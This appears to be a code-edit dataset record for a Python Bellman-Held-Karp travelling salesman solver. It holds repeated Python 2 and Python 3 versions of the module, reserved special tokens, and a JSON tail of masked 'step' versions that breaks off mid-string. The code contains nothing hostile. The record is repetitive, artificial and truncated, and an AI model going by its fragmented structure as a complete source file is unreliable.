    def __init__(self, x, y):
        # Coerce to float so integer inputs still yield real-valued
        # distance computations downstream.
        self.x, self.y = float(x), float(y)
def distance(v1, v2):
    """Return the Euclidean distance between two `Vertex` instances."""
    dx = v1.x - v2.x
    dy = v1.y - v2.y
    return (dx ** 2 + dy ** 2) ** 0.5
def adjacency_matrix(graph):
    """
    Build the n x n matrix of pairwise Euclidean distances for `graph`,
    a list of `Vertex` instances treated as a complete graph.

    Uses `range` instead of the Python-2-only `xrange` so the module
    also runs on Python 3.
    """
    m = [[None for v in graph] for v in graph]
    for i in range(len(m)):
        for j in range(len(m[i])):
            # Diagonal entries come out 0.0 since distance(v, v) == 0.
            m[i][j] = distance(graph[i], graph[j])
    return m
def main():
    """Smoke-test all three solvers on two instances with known optima."""
    solvers = (held_karp_recursive, held_karp_topdown, held_karp_bottomup)

    # Square of side 4: optimal tour 0 -> 2 -> 1 -> 3 -> 0, length 16.
    square = adjacency_matrix(
        [Vertex(0, 0), Vertex(4, 4), Vertex(4, 0), Vertex(0, 4)])
    for solve in solvers:
        cost, path = solve(square)
        assert cost == 16.0
        assert path == [0, 2, 1, 3, 0]

    # Five cities: optimal tour 0 -> 3 -> 1 -> 2 -> 4 -> 0, length ~15.7734.
    five = adjacency_matrix([Vertex(0, 0), Vertex(4, 4), Vertex(0, 3),
                             Vertex(4, 0), Vertex(1, 2)])
    for solve in solvers:
        cost, path = solve(five)
        assert abs(cost - 15.7733871) < 0.001
        assert path == [0, 3, 1, 2, 4, 0]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def held_karp_recursive(distance_matrix):
    """
    Solve the TSP exactly with the purely recursive Bellman-Held-Karp
    recurrence (no memoization).

    Args:
        distance_matrix: square list-of-lists of pairwise distances for
            a complete graph; entry [i][j] is the cost of edge i -> j.

    Returns:
        (cost, path): the length of the minimum Hamiltonian cycle that
        starts and ends at city 0, and the tour itself as a list of city
        indices (beginning and ending with 0).

    Note: replaces the Python-2-only ``xrange``/``sys.maxint`` with
    ``range``/``float('inf')`` so the function also runs on Python 3.
    """
    d = distance_matrix
    n = len(d)

    def f(i, visited, path_so_far):
        """
        Minimum-cost completion from city ``i`` back to city 0 through
        every city whose bit is still clear in the ``visited`` bitmask
        (bit j set == city j already visited).  ``path_so_far`` is the
        route from city 0 up to ``i``; it is only ever extended by
        concatenation (never mutated), so sibling recursive calls cannot
        corrupt each other's paths.
        """
        # Base case: every city seen -- close the tour back to city 0.
        if visited == (1 << n) - 1:
            return d[i][0], path_so_far + [0]
        min_dist = float('inf')  # sys.maxint does not exist on Python 3
        min_path = None
        # Try every still-unvisited city as the next stop.
        for j in range(n):
            if not (1 << j) & visited:
                dist_from_j, path_with_j = f(j, visited | (1 << j),
                                             path_so_far + [j])
                dist_with_j = d[i][j] + dist_from_j
                if dist_with_j < min_dist:
                    min_dist = dist_with_j
                    min_path = path_with_j
        return min_dist, min_path

    # Start at city 0 with nothing visited and an empty path.
    return f(0, 0, [])
def held_karp_topdown(distance_matrix):
    """
    Bellman-Held-Karp TSP solver with memoization (top-down DP).

    Same contract as ``held_karp_recursive``: takes the adjacency matrix
    of a complete graph and returns ``(cost, path)`` for the minimum
    Hamiltonian cycle through city 0.

    Improvements over the original:
      * ``range``/``float('inf')`` instead of the Python-2-only
        ``xrange``/``sys.maxint``, so it also runs on Python 3;
      * the memo hit test uses ``is not None`` instead of truthiness, so
        a legitimately cached distance of ``0.0`` is not recomputed.
    """
    d = distance_matrix
    n = len(d)
    # dp[i][visited]: minimum distance from city i back to city 0
    # through all cities not yet in the `visited` bitmask.
    # child[i][visited]: the next city chosen from state (i, visited);
    # following these pointers reproduces the optimal tour.
    dp = [[None for _ in range(2 ** n)] for _ in range(n)]
    child = [[None for _ in range(2 ** n)] for _ in range(n)]

    def f(i, visited):
        """Memoized recurrence; fills dp/child as a side effect."""
        if dp[i][visited] is not None:  # cache hit (0.0 included)
            return dp[i][visited]
        # Base case: all cities visited -- return to city 0.
        if visited == (1 << n) - 1:
            dp[i][visited] = d[i][0]
            child[i][visited] = 0
            return d[i][0]
        min_dist = float('inf')
        chosen_j = None
        for j in range(n):
            if not (1 << j) & visited:
                dist_with_j = d[i][j] + f(j, (1 << j) | visited)
                if dist_with_j < min_dist:
                    min_dist = dist_with_j
                    chosen_j = j
        dp[i][visited] = min_dist
        child[i][visited] = chosen_j
        return min_dist

    # Optimal tour cost: start at city 0 with only city 0 visited.
    ans = f(0, 1)
    # Reconstruct the tour by walking the child pointers until a state
    # with no recorded successor is reached (just past the final 0).
    path = [0]
    i, visited = 0, 1
    next_ = child[i][visited]
    while next_ is not None:
        path.append(next_)
        visited |= 1 << next_
        next_ = child[next_][visited]
    return ans, path
def held_karp_bottomup(distance_matrix):
    """
    Bellman-Held-Karp TSP solver, bottom-up (tabulated) dynamic programming.

    Takes the adjacency matrix of a complete graph and returns
    ``(cost, path)``: the length of the minimum Hamiltonian cycle through
    city 0, and the tour itself as a list of city indices (starting and
    ending with 0).  The tour is recovered afterwards by walking the
    finished table: from state (i, visited) the successor j is the
    unvisited city whose subproblem cost differs from ours by exactly the
    edge d[i][j] (within a small tolerance, since distances are floats).

    ``range``/``float('inf')`` replace the Python-2-only
    ``xrange``/``sys.maxint`` so the function also runs on Python 3.
    """
    d = distance_matrix
    n = len(d)
    dp = [[None for _ in range(2 ** n)] for _ in range(n)]
    # Base case: with every city visited, the only move left is i -> 0.
    for i in range(n):
        dp[i][(1 << n) - 1] = d[i][0]
    # Fill the table from "almost everything visited" down to "nothing
    # visited"; each state only consults states with strictly more bits set.
    for visited in reversed(range((1 << n) - 1)):
        for i in range(n):
            min_dist = float('inf')  # sys.maxint does not exist on Python 3
            for j in range(n):
                if not (1 << j) & visited:
                    dist_j = d[i][j] + dp[j][visited | (1 << j)]
                    if dist_j < min_dist:
                        min_dist = dist_j
            dp[i][visited] = min_dist
    # Cost of the optimal tour: at city 0 with only city 0 visited.
    ans = dp[0][1]
    # Recover the tour by working forwards through the table.
    path = [0]
    i, visited = 0, 1
    cost_from_i = dp[i][visited]
    while visited != (1 << n) - 1:
        for j in range(n):
            if not visited & (1 << j):
                cost_from_j = dp[j][visited | (1 << j)]
                # j was the chosen successor iff the costs differ by
                # exactly the edge i -> j (tolerance for float error).
                if abs(cost_from_i - cost_from_j - d[i][j]) < 0.001:
                    path.append(j)
                    i, visited = j, visited | (1 << j)
                    cost_from_i = cost_from_j
                    break
    # All cities visited: close the tour at city 0.
    path.append(0)
    return ans, path
class Vertex:
    """A point in the Euclidean plane, stored as float coordinates."""

    def __init__(self, x, y):
        # Coerce to float so integer inputs still yield real-valued
        # distance computations downstream.
        self.x, self.y = float(x), float(y)
def distance(v1, v2):
    """Return the Euclidean distance between two `Vertex` instances."""
    dx = v1.x - v2.x
    dy = v1.y - v2.y
    return (dx ** 2 + dy ** 2) ** 0.5
def adjacency_matrix(graph):
    """
    Build the n x n matrix of pairwise Euclidean distances for `graph`,
    a list of `Vertex` instances treated as a complete graph.

    Uses `range` instead of the Python-2-only `xrange` so the module
    also runs on Python 3.
    """
    m = [[None for v in graph] for v in graph]
    for i in range(len(m)):
        for j in range(len(m[i])):
            # Diagonal entries come out 0.0 since distance(v, v) == 0.
            m[i][j] = distance(graph[i], graph[j])
    return m
def main():
    """Smoke-test all three solvers on two instances with known optima."""
    solvers = (held_karp_recursive, held_karp_topdown, held_karp_bottomup)

    # Square of side 4: optimal tour 0 -> 2 -> 1 -> 3 -> 0, length 16.
    square = adjacency_matrix(
        [Vertex(0, 0), Vertex(4, 4), Vertex(4, 0), Vertex(0, 4)])
    for solve in solvers:
        cost, path = solve(square)
        assert cost == 16.0
        assert path == [0, 2, 1, 3, 0]

    # Five cities: optimal tour 0 -> 3 -> 1 -> 2 -> 4 -> 0, length ~15.7734.
    five = adjacency_matrix([Vertex(0, 0), Vertex(4, 4), Vertex(0, 3),
                             Vertex(4, 0), Vertex(1, 2)])
    for solve in solvers:
        cost, path = solve(five)
        assert abs(cost - 15.7733871) < 0.001
        assert path == [0, 3, 1, 2, 4, 0]


if __name__ == '__main__':
    main()
<|reserved_special_token_1|>
'''
held-karp.py
Implementation of the Bellman-Held-Karp Algorithm to exactly solve TSPs,
requiring no external dependencies.
Includes a purely recursive implementation, as well as both top-down and
bottom-up dynamic programming approaches.
'''
import sys
def held_karp_recursive(distance_matrix):
    """
    Solve the TSP exactly with the purely recursive Bellman-Held-Karp
    recurrence (no memoization).

    Args:
        distance_matrix: square list-of-lists of pairwise distances for
            a complete graph; entry [i][j] is the cost of edge i -> j.

    Returns:
        (cost, path): the length of the minimum Hamiltonian cycle that
        starts and ends at city 0, and the tour itself as a list of city
        indices (beginning and ending with 0).

    Note: replaces the Python-2-only ``xrange``/``sys.maxint`` with
    ``range``/``float('inf')`` so the function also runs on Python 3.
    """
    d = distance_matrix
    n = len(d)

    def f(i, visited, path_so_far):
        """
        Minimum-cost completion from city ``i`` back to city 0 through
        every city whose bit is still clear in the ``visited`` bitmask
        (bit j set == city j already visited).  ``path_so_far`` is the
        route from city 0 up to ``i``; it is only ever extended by
        concatenation (never mutated), so sibling recursive calls cannot
        corrupt each other's paths.
        """
        # Base case: every city seen -- close the tour back to city 0.
        if visited == (1 << n) - 1:
            return d[i][0], path_so_far + [0]
        min_dist = float('inf')  # sys.maxint does not exist on Python 3
        min_path = None
        # Try every still-unvisited city as the next stop.
        for j in range(n):
            if not (1 << j) & visited:
                dist_from_j, path_with_j = f(j, visited | (1 << j),
                                             path_so_far + [j])
                dist_with_j = d[i][j] + dist_from_j
                if dist_with_j < min_dist:
                    min_dist = dist_with_j
                    min_path = path_with_j
        return min_dist, min_path

    # Start at city 0 with nothing visited and an empty path.
    return f(0, 0, [])
def held_karp_topdown(distance_matrix):
    """
    Bellman-Held-Karp TSP solver with memoization (top-down DP).

    Same contract as ``held_karp_recursive``: takes the adjacency matrix
    of a complete graph and returns ``(cost, path)`` for the minimum
    Hamiltonian cycle through city 0.

    Improvements over the original:
      * ``range``/``float('inf')`` instead of the Python-2-only
        ``xrange``/``sys.maxint``, so it also runs on Python 3;
      * the memo hit test uses ``is not None`` instead of truthiness, so
        a legitimately cached distance of ``0.0`` is not recomputed.
    """
    d = distance_matrix
    n = len(d)
    # dp[i][visited]: minimum distance from city i back to city 0
    # through all cities not yet in the `visited` bitmask.  There are n
    # cities and 2^n bitmasks, hence the n x 2^n tables.
    # child[i][visited]: the next city chosen from state (i, visited);
    # following these pointers reproduces the optimal tour.
    dp = [[None for _ in range(2 ** n)] for _ in range(n)]
    child = [[None for _ in range(2 ** n)] for _ in range(n)]

    def f(i, visited):
        """Memoized recurrence; fills dp/child as a side effect."""
        if dp[i][visited] is not None:  # cache hit (0.0 included)
            return dp[i][visited]
        # Base case: all cities visited -- return to city 0.
        if visited == (1 << n) - 1:
            dp[i][visited] = d[i][0]
            child[i][visited] = 0
            return d[i][0]
        min_dist = float('inf')
        chosen_j = None
        for j in range(n):
            if not (1 << j) & visited:
                dist_with_j = d[i][j] + f(j, (1 << j) | visited)
                if dist_with_j < min_dist:
                    min_dist = dist_with_j
                    chosen_j = j
        dp[i][visited] = min_dist
        child[i][visited] = chosen_j
        return min_dist

    # Optimal tour cost: start at city 0 with only city 0 visited.
    ans = f(0, 1)
    # Reconstruct the tour by walking the child pointers until a state
    # with no recorded successor is reached (just past the final 0).
    path = [0]
    i, visited = 0, 1
    next_ = child[i][visited]
    while next_ is not None:
        path.append(next_)
        visited |= 1 << next_
        next_ = child[next_][visited]
    return ans, path
def held_karp_bottomup(distance_matrix):
    """
    Bellman-Held-Karp TSP solver, bottom-up (tabulated) dynamic programming.

    Takes the adjacency matrix of a complete graph and returns
    ``(cost, path)``: the length of the minimum Hamiltonian cycle through
    city 0, and the tour itself as a list of city indices (starting and
    ending with 0).  The tour is recovered afterwards by walking the
    finished table: from state (i, visited) the successor j is the
    unvisited city whose subproblem cost differs from ours by exactly the
    edge d[i][j] (within a small tolerance, since distances are floats).

    ``range``/``float('inf')`` replace the Python-2-only
    ``xrange``/``sys.maxint`` so the function also runs on Python 3.
    """
    d = distance_matrix
    n = len(d)
    dp = [[None for _ in range(2 ** n)] for _ in range(n)]
    # Base case: with every city visited, the only move left is i -> 0.
    for i in range(n):
        dp[i][(1 << n) - 1] = d[i][0]
    # Fill the table from "almost everything visited" down to "nothing
    # visited"; each state only consults states with strictly more bits set.
    for visited in reversed(range((1 << n) - 1)):
        for i in range(n):
            min_dist = float('inf')  # sys.maxint does not exist on Python 3
            for j in range(n):
                if not (1 << j) & visited:
                    dist_j = d[i][j] + dp[j][visited | (1 << j)]
                    if dist_j < min_dist:
                        min_dist = dist_j
            dp[i][visited] = min_dist
    # Cost of the optimal tour: at city 0 with only city 0 visited.
    ans = dp[0][1]
    # Recover the tour by working forwards through the table.
    path = [0]
    i, visited = 0, 1
    cost_from_i = dp[i][visited]
    while visited != (1 << n) - 1:
        for j in range(n):
            if not visited & (1 << j):
                cost_from_j = dp[j][visited | (1 << j)]
                # j was the chosen successor iff the costs differ by
                # exactly the edge i -> j (tolerance for float error).
                if abs(cost_from_i - cost_from_j - d[i][j]) < 0.001:
                    path.append(j)
                    i, visited = j, visited | (1 << j)
                    cost_from_i = cost_from_j
                    break
    # All cities visited: close the tour at city 0.
    path.append(0)
    return ans, path
class Vertex:
    """A point in the Euclidean plane, stored as float coordinates."""

    def __init__(self, x, y):
        # Coerce to float so integer inputs still yield real-valued
        # distance computations downstream.
        self.x, self.y = float(x), float(y)
def distance(v1, v2):
    """Return the Euclidean distance between two `Vertex` instances."""
    dx = v1.x - v2.x
    dy = v1.y - v2.y
    return (dx ** 2 + dy ** 2) ** 0.5
def adjacency_matrix(graph):
    """
    Build the n x n matrix of pairwise Euclidean distances for `graph`,
    a list of `Vertex` instances treated as a complete graph.

    Uses `range` instead of the Python-2-only `xrange` so the module
    also runs on Python 3.
    """
    m = [[None for v in graph] for v in graph]
    for i in range(len(m)):
        for j in range(len(m[i])):
            # Diagonal entries come out 0.0 since distance(v, v) == 0.
            m[i][j] = distance(graph[i], graph[j])
    return m
def main():
    """Smoke-test all three solvers on two instances with known optima."""
    solvers = (held_karp_recursive, held_karp_topdown, held_karp_bottomup)

    # Square of side 4: optimal tour 0 -> 2 -> 1 -> 3 -> 0, length 16.
    square = adjacency_matrix(
        [Vertex(0, 0), Vertex(4, 4), Vertex(4, 0), Vertex(0, 4)])
    for solve in solvers:
        cost, path = solve(square)
        assert cost == 16.0
        assert path == [0, 2, 1, 3, 0]

    # Five cities: optimal tour 0 -> 3 -> 1 -> 2 -> 4 -> 0, length ~15.7734.
    five = adjacency_matrix([Vertex(0, 0), Vertex(4, 4), Vertex(0, 3),
                             Vertex(4, 0), Vertex(1, 2)])
    for solve in solvers:
        cost, path = solve(five)
        assert abs(cost - 15.7733871) < 0.001
        assert path == [0, 3, 1, 2, 4, 0]


if __name__ == '__main__':
    main()
|
flexible
|
{
"blob_id": "3e8fa71c4e23348c6f00fe97729b5717bb6245a1",
"index": 8070,
"step-1": "<mask token>\n\n\ndef held_karp_bottomup(distance_matrix):\n \"\"\"\n In the bottom up implementation, we compute all possible solutions for the\n values `i` and `visited` as in the implementations above, and then\n simply look up the value for f(0,0).\n\n With this approach, we use the dp table, the original `distance_matrix`\n and knowledge of the optimal cost to work backwards in determing what\n the optimal path was.\n \"\"\"\n d = distance_matrix\n n = len(d)\n dp = [[None for i in xrange(2 ** n)] for j in xrange(n)]\n for i in xrange(n):\n dp[i][(1 << n) - 1] = d[i][0]\n for visited in reversed(xrange((1 << n) - 1)):\n for i in xrange(n):\n min_dist = sys.maxint\n for j in xrange(n):\n if not 1 << j & visited:\n dist_j = d[i][j] + dp[j][visited | 1 << j]\n if dist_j < min_dist:\n min_dist = dist_j\n dp[i][visited] = min_dist\n ans = dp[0][1]\n path = [0]\n i, visited = 0, 1\n cost_from_i = dp[i][visited]\n while visited != (1 << n) - 1:\n for j in xrange(n):\n if not visited & 1 << j:\n cost_from_j = dp[j][visited | 1 << j]\n if abs(cost_from_i - cost_from_j - d[i][j]) < 0.001:\n path.append(j)\n i, visited = j, visited | 1 << j\n cost_from_i = cost_from_j\n break\n path.append(0)\n return ans, path\n\n\nclass Vertex:\n \"\"\" Simple implementation of a point in Euclidean space \"\"\"\n\n def __init__(self, x, y):\n self.x = float(x)\n self.y = float(y)\n\n\n<mask token>\n\n\ndef adjacency_matrix(graph):\n \"\"\"\n Construct the corresponding adjacency matrix from a list of verticies in a\n graph, assumed to be a complete graph.\n \"\"\"\n m = [[None for v in graph] for v in graph]\n for i in xrange(len(m)):\n for j in xrange(len(m[i])):\n m[i][j] = distance(graph[i], graph[j])\n return m\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef held_karp_recursive(distance_matrix):\n \"\"\"\n Solution to TSP using the Bellman-Held-Karp Algorithm\n\n Given the adjacency matrix to a corresponding tsp problem, find the\n minimum cost Hamiltonian cycle through the graph, as well as the\n corresponding path\n \"\"\"\n d = distance_matrix\n n = len(d)\n\n def f(i, visited, path_so_far):\n \"\"\"\n Let f(i, visited, path_so_far) be the path of minimum distance from\n city i to city 0, that passes through all remaining unvisited cities in\n `visited`, where visited is a bitmask such that the bit in the jth\n position being 1 represents city j having been visited, and bit j\n being 0 represents city j having not been visited, and `path_so_far` is\n the current path of minimum distance from city 0 up to city i.\n\n Then the solution we want is f(0, 0, []), and the following recursive\n relation holds:\n\n f(i, visited) = min_{j in unvisited} ( d(i,j) + f(j, visited | (1<<j)) )\n\n NOTE: Must be careful not to mutate\n \"\"\"\n if visited == (1 << n) - 1:\n return d[i][0], path_so_far + [0]\n min_dist = sys.maxint\n for j in xrange(n):\n if not 1 << j & visited:\n dist_from_j, path_with_j = f(j, visited | 1 << j, \n path_so_far + [j])\n dist_with_j = d[i][j] + dist_from_j\n if dist_with_j < min_dist:\n min_dist = dist_with_j\n min_path = path_with_j\n return min_dist, min_path\n return f(0, 0, [])\n\n\ndef held_karp_topdown(distance_matrix):\n \"\"\"\n Above algorithm, but making use of memoization to avoid recomputing\n overlapping subproblems\n \"\"\"\n d = distance_matrix\n n = len(d)\n \"\"\"\n We need a dp table that will store the minimum distances from city i\n to city 0 that passes through all unvisitied cities in the bit mask.\n There are n cities, and 2^n possible binary strings of length n, so our\n table will have dimensions n x 2^n\n\n With this approach, we use another table called 'child' that keeps track\n of the child city of i for each combination of (i, visited), 
and we can\n use this table to obtain the actual Hamiltonian cycle of minimum distance.\n \"\"\"\n dp = [[None for i in xrange(2 ** n)] for j in xrange(n)]\n child = [[None for i in xrange(2 ** n)] for j in xrange(n)]\n\n def f(i, visited):\n \"\"\"\n f is defined as in the purely recursive implementation above.\n The only difference here is that we check if the value we are\n looking for is already in the defined dp table, and we do not\n keep track of the path as we go along, as looking up a solution\n for any given value would require having stored the path for\n that solution as well, which would be expensive.\n\n As such, we use the `child` table to keep track of where we\n came from.\n \"\"\"\n if dp[i][visited]:\n return dp[i][visited]\n if visited == (1 << n) - 1:\n dp[i][visited] = d[i][0]\n child[i][visited] = 0\n return d[i][0]\n min_dist = sys.maxint\n chosen_j = None\n for j in xrange(n):\n if not 1 << j & visited:\n dist_with_j = d[i][j] + f(j, 1 << j | visited)\n if dist_with_j < min_dist:\n min_dist = dist_with_j\n chosen_j = j\n dp[i][visited] = min_dist\n child[i][visited] = chosen_j\n return min_dist\n ans = f(0, 1)\n path = [0]\n i, visited = 0, 1\n next_ = child[i][visited]\n while next_ is not None:\n path.append(next_)\n visited |= 1 << next_\n next_ = child[next_][visited]\n return ans, path\n\n\ndef held_karp_bottomup(distance_matrix):\n \"\"\"\n In the bottom up implementation, we compute all possible solutions for the\n values `i` and `visited` as in the implementations above, and then\n simply look up the value for f(0,0).\n\n With this approach, we use the dp table, the original `distance_matrix`\n and knowledge of the optimal cost to work backwards in determing what\n the optimal path was.\n \"\"\"\n d = distance_matrix\n n = len(d)\n dp = [[None for i in xrange(2 ** n)] for j in xrange(n)]\n for i in xrange(n):\n dp[i][(1 << n) - 1] = d[i][0]\n for visited in reversed(xrange((1 << n) - 1)):\n for i in xrange(n):\n min_dist = 
sys.maxint\n for j in xrange(n):\n if not 1 << j & visited:\n dist_j = d[i][j] + dp[j][visited | 1 << j]\n if dist_j < min_dist:\n min_dist = dist_j\n dp[i][visited] = min_dist\n ans = dp[0][1]\n path = [0]\n i, visited = 0, 1\n cost_from_i = dp[i][visited]\n while visited != (1 << n) - 1:\n for j in xrange(n):\n if not visited & 1 << j:\n cost_from_j = dp[j][visited | 1 << j]\n if abs(cost_from_i - cost_from_j - d[i][j]) < 0.001:\n path.append(j)\n i, visited = j, visited | 1 << j\n cost_from_i = cost_from_j\n break\n path.append(0)\n return ans, path\n\n\nclass Vertex:\n \"\"\" Simple implementation of a point in Euclidean space \"\"\"\n\n def __init__(self, x, y):\n self.x = float(x)\n self.y = float(y)\n\n\ndef distance(v1, v2):\n \"\"\" Euclidean distance between two `Vertex` instances \"\"\"\n return ((v1.x - v2.x) ** 2 + (v1.y - v2.y) ** 2) ** 0.5\n\n\ndef adjacency_matrix(graph):\n \"\"\"\n Construct the corresponding adjacency matrix from a list of verticies in a\n graph, assumed to be a complete graph.\n \"\"\"\n m = [[None for v in graph] for v in graph]\n for i in xrange(len(m)):\n for j in xrange(len(m[i])):\n m[i][j] = distance(graph[i], graph[j])\n return m\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef held_karp_recursive(distance_matrix):\n \"\"\"\n Solution to TSP using the Bellman-Held-Karp Algorithm\n\n Given the adjacency matrix to a corresponding tsp problem, find the\n minimum cost Hamiltonian cycle through the graph, as well as the\n corresponding path\n \"\"\"\n d = distance_matrix\n n = len(d)\n\n def f(i, visited, path_so_far):\n \"\"\"\n Let f(i, visited, path_so_far) be the path of minimum distance from\n city i to city 0, that passes through all remaining unvisited cities in\n `visited`, where visited is a bitmask such that the bit in the jth\n position being 1 represents city j having been visited, and bit j\n being 0 represents city j having not been visited, and `path_so_far` is\n the current path of minimum distance from city 0 up to city i.\n\n Then the solution we want is f(0, 0, []), and the following recursive\n relation holds:\n\n f(i, visited) = min_{j in unvisited} ( d(i,j) + f(j, visited | (1<<j)) )\n\n NOTE: Must be careful not to mutate\n \"\"\"\n if visited == (1 << n) - 1:\n return d[i][0], path_so_far + [0]\n min_dist = sys.maxint\n for j in xrange(n):\n if not 1 << j & visited:\n dist_from_j, path_with_j = f(j, visited | 1 << j, \n path_so_far + [j])\n dist_with_j = d[i][j] + dist_from_j\n if dist_with_j < min_dist:\n min_dist = dist_with_j\n min_path = path_with_j\n return min_dist, min_path\n return f(0, 0, [])\n\n\ndef held_karp_topdown(distance_matrix):\n \"\"\"\n Above algorithm, but making use of memoization to avoid recomputing\n overlapping subproblems\n \"\"\"\n d = distance_matrix\n n = len(d)\n \"\"\"\n We need a dp table that will store the minimum distances from city i\n to city 0 that passes through all unvisitied cities in the bit mask.\n There are n cities, and 2^n possible binary strings of length n, so our\n table will have dimensions n x 2^n\n\n With this approach, we use another table called 'child' that keeps track\n of the child city of i for each combination of (i, visited), 
and we can\n use this table to obtain the actual Hamiltonian cycle of minimum distance.\n \"\"\"\n dp = [[None for i in xrange(2 ** n)] for j in xrange(n)]\n child = [[None for i in xrange(2 ** n)] for j in xrange(n)]\n\n def f(i, visited):\n \"\"\"\n f is defined as in the purely recursive implementation above.\n The only difference here is that we check if the value we are\n looking for is already in the defined dp table, and we do not\n keep track of the path as we go along, as looking up a solution\n for any given value would require having stored the path for\n that solution as well, which would be expensive.\n\n As such, we use the `child` table to keep track of where we\n came from.\n \"\"\"\n if dp[i][visited]:\n return dp[i][visited]\n if visited == (1 << n) - 1:\n dp[i][visited] = d[i][0]\n child[i][visited] = 0\n return d[i][0]\n min_dist = sys.maxint\n chosen_j = None\n for j in xrange(n):\n if not 1 << j & visited:\n dist_with_j = d[i][j] + f(j, 1 << j | visited)\n if dist_with_j < min_dist:\n min_dist = dist_with_j\n chosen_j = j\n dp[i][visited] = min_dist\n child[i][visited] = chosen_j\n return min_dist\n ans = f(0, 1)\n path = [0]\n i, visited = 0, 1\n next_ = child[i][visited]\n while next_ is not None:\n path.append(next_)\n visited |= 1 << next_\n next_ = child[next_][visited]\n return ans, path\n\n\ndef held_karp_bottomup(distance_matrix):\n \"\"\"\n In the bottom up implementation, we compute all possible solutions for the\n values `i` and `visited` as in the implementations above, and then\n simply look up the value for f(0,0).\n\n With this approach, we use the dp table, the original `distance_matrix`\n and knowledge of the optimal cost to work backwards in determing what\n the optimal path was.\n \"\"\"\n d = distance_matrix\n n = len(d)\n dp = [[None for i in xrange(2 ** n)] for j in xrange(n)]\n for i in xrange(n):\n dp[i][(1 << n) - 1] = d[i][0]\n for visited in reversed(xrange((1 << n) - 1)):\n for i in xrange(n):\n min_dist = 
sys.maxint\n for j in xrange(n):\n if not 1 << j & visited:\n dist_j = d[i][j] + dp[j][visited | 1 << j]\n if dist_j < min_dist:\n min_dist = dist_j\n dp[i][visited] = min_dist\n ans = dp[0][1]\n path = [0]\n i, visited = 0, 1\n cost_from_i = dp[i][visited]\n while visited != (1 << n) - 1:\n for j in xrange(n):\n if not visited & 1 << j:\n cost_from_j = dp[j][visited | 1 << j]\n if abs(cost_from_i - cost_from_j - d[i][j]) < 0.001:\n path.append(j)\n i, visited = j, visited | 1 << j\n cost_from_i = cost_from_j\n break\n path.append(0)\n return ans, path\n\n\nclass Vertex:\n \"\"\" Simple implementation of a point in Euclidean space \"\"\"\n\n def __init__(self, x, y):\n self.x = float(x)\n self.y = float(y)\n\n\ndef distance(v1, v2):\n \"\"\" Euclidean distance between two `Vertex` instances \"\"\"\n return ((v1.x - v2.x) ** 2 + (v1.y - v2.y) ** 2) ** 0.5\n\n\ndef adjacency_matrix(graph):\n \"\"\"\n Construct the corresponding adjacency matrix from a list of verticies in a\n graph, assumed to be a complete graph.\n \"\"\"\n m = [[None for v in graph] for v in graph]\n for i in xrange(len(m)):\n for j in xrange(len(m[i])):\n m[i][j] = distance(graph[i], graph[j])\n return m\n\n\ndef main():\n g1 = [Vertex(0, 0), Vertex(4, 4), Vertex(4, 0), Vertex(0, 4)]\n m1 = adjacency_matrix(g1)\n for solver in (held_karp_recursive, held_karp_topdown, held_karp_bottomup):\n cost, path = solver(m1)\n assert cost == 16.0\n assert path == [0, 2, 1, 3, 0]\n g2 = [Vertex(0, 0), Vertex(4, 4), Vertex(0, 3), Vertex(4, 0), Vertex(1, 2)]\n m2 = adjacency_matrix(g2)\n for solver in (held_karp_recursive, held_karp_topdown, held_karp_bottomup):\n cost, path = solver(m2)\n assert abs(cost - 15.7733871) < 0.001\n assert path == [0, 3, 1, 2, 4, 0]\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef held_karp_recursive(distance_matrix):\n \"\"\"\n Solution to TSP using the Bellman-Held-Karp Algorithm\n\n Given the adjacency matrix to a corresponding tsp problem, find the\n minimum cost Hamiltonian cycle through the graph, as well as the\n corresponding path\n \"\"\"\n d = distance_matrix\n n = len(d)\n\n def f(i, visited, path_so_far):\n \"\"\"\n Let f(i, visited, path_so_far) be the path of minimum distance from\n city i to city 0, that passes through all remaining unvisited cities in\n `visited`, where visited is a bitmask such that the bit in the jth\n position being 1 represents city j having been visited, and bit j\n being 0 represents city j having not been visited, and `path_so_far` is\n the current path of minimum distance from city 0 up to city i.\n\n Then the solution we want is f(0, 0, []), and the following recursive\n relation holds:\n\n f(i, visited) = min_{j in unvisited} ( d(i,j) + f(j, visited | (1<<j)) )\n\n NOTE: Must be careful not to mutate\n \"\"\"\n if visited == (1 << n) - 1:\n return d[i][0], path_so_far + [0]\n min_dist = sys.maxint\n for j in xrange(n):\n if not 1 << j & visited:\n dist_from_j, path_with_j = f(j, visited | 1 << j, \n path_so_far + [j])\n dist_with_j = d[i][j] + dist_from_j\n if dist_with_j < min_dist:\n min_dist = dist_with_j\n min_path = path_with_j\n return min_dist, min_path\n return f(0, 0, [])\n\n\ndef held_karp_topdown(distance_matrix):\n \"\"\"\n Above algorithm, but making use of memoization to avoid recomputing\n overlapping subproblems\n \"\"\"\n d = distance_matrix\n n = len(d)\n \"\"\"\n We need a dp table that will store the minimum distances from city i\n to city 0 that passes through all unvisitied cities in the bit mask.\n There are n cities, and 2^n possible binary strings of length n, so our\n table will have dimensions n x 2^n\n\n With this approach, we use another table called 'child' that keeps track\n of the child city of i for each combination of (i, visited), 
and we can\n use this table to obtain the actual Hamiltonian cycle of minimum distance.\n \"\"\"\n dp = [[None for i in xrange(2 ** n)] for j in xrange(n)]\n child = [[None for i in xrange(2 ** n)] for j in xrange(n)]\n\n def f(i, visited):\n \"\"\"\n f is defined as in the purely recursive implementation above.\n The only difference here is that we check if the value we are\n looking for is already in the defined dp table, and we do not\n keep track of the path as we go along, as looking up a solution\n for any given value would require having stored the path for\n that solution as well, which would be expensive.\n\n As such, we use the `child` table to keep track of where we\n came from.\n \"\"\"\n if dp[i][visited]:\n return dp[i][visited]\n if visited == (1 << n) - 1:\n dp[i][visited] = d[i][0]\n child[i][visited] = 0\n return d[i][0]\n min_dist = sys.maxint\n chosen_j = None\n for j in xrange(n):\n if not 1 << j & visited:\n dist_with_j = d[i][j] + f(j, 1 << j | visited)\n if dist_with_j < min_dist:\n min_dist = dist_with_j\n chosen_j = j\n dp[i][visited] = min_dist\n child[i][visited] = chosen_j\n return min_dist\n ans = f(0, 1)\n path = [0]\n i, visited = 0, 1\n next_ = child[i][visited]\n while next_ is not None:\n path.append(next_)\n visited |= 1 << next_\n next_ = child[next_][visited]\n return ans, path\n\n\ndef held_karp_bottomup(distance_matrix):\n \"\"\"\n In the bottom up implementation, we compute all possible solutions for the\n values `i` and `visited` as in 